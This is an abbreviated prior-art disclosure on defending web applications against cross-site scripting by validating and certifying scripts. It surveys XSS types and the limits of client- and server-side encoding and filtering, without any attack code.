Browse Prior Art Database

Cross-site Script Validation with Certification Disclosure Number: IPCOM000250550D
Publication Date: 2017-Aug-02
Document File: 4 page(s) / 94K

Publishing Venue

The Prior Art Database

This text was extracted from a PDF file.
This is the abbreviated version, containing approximately 27% of the total text.

Cross-site Script Validation with Certification

This disclosure addresses cross-site scripting (XSS) threat problem in the web application security domain, in which web browsers or any user agents render the HTML pages with scripting for users. JavaScript is mainly targeted in this disclosure because it is most commonly used in the client side. Other scripting languages can be addressed in the similar way if they use tags.

Cross-site scripting (XSS) happens when a browser executes JavaScript. If the browser executes the JavaScript containing any malicious codes from the attacker, the data and system can be compromised, such as theft of the user session cookie, illegal data access. There can be three kinds of XSS: Persistent XSS, Reflected XSS, DOM-based XSS. They are different in where the malicious content come from and how it is inserted as the legitimate script code. However, they share the common root cause: inability to identify the malicious codes in both server and client side.

As mentioned later, although we are not so ambitious as to solve the web No.1 XSS threats completely, our disclosure is aimed to maintain even improve the secure level with less efforts from the normal developer. Describe the known solutions and drawbacks

The easiest way to handle the XSS threads is to forbid the browser from executing any JavaScript. However, this just stops any benefits of AJAX and causes all kinds of problems from performance to user experience.

There are large efforts to mitigate the risk of XSS risks. In order to allow to execute JavaScript on the client side, Web UI and application

developers have to devote large amount of efforts to implementing either encoding or validation or both algorithms to handle suspected content case by case. Even so, the human mistakes and the new versions of XMLs can cause security loopholes.

The common solutions include both server and client side efforts. The client side only does the basic encoding (escaping special characters) or validation

(filtering out suspected strings). To some extend, this can reduce the risks of injecting malicious strings from the attacker. But this mainly for some persistent XSS attack risk. Even so, the UI developers may not know what kinds of input the attacker will use, which causes the big risk.

The server side has better conditions to handle the malicious input since it knows more about the context of inserting the input. To some extend, this can reduce the risks of reflected XSS, in which the input comes from the request URL. However, sometimes the client doesn't send the input strings to the server, and the server can do nothing to prevent the client from inserting the malicious input to the DOM tree, generated from the server HTML.

So even the application is carefully implemented in both server and client, case by case. There are still many loopholes of the complicated solution....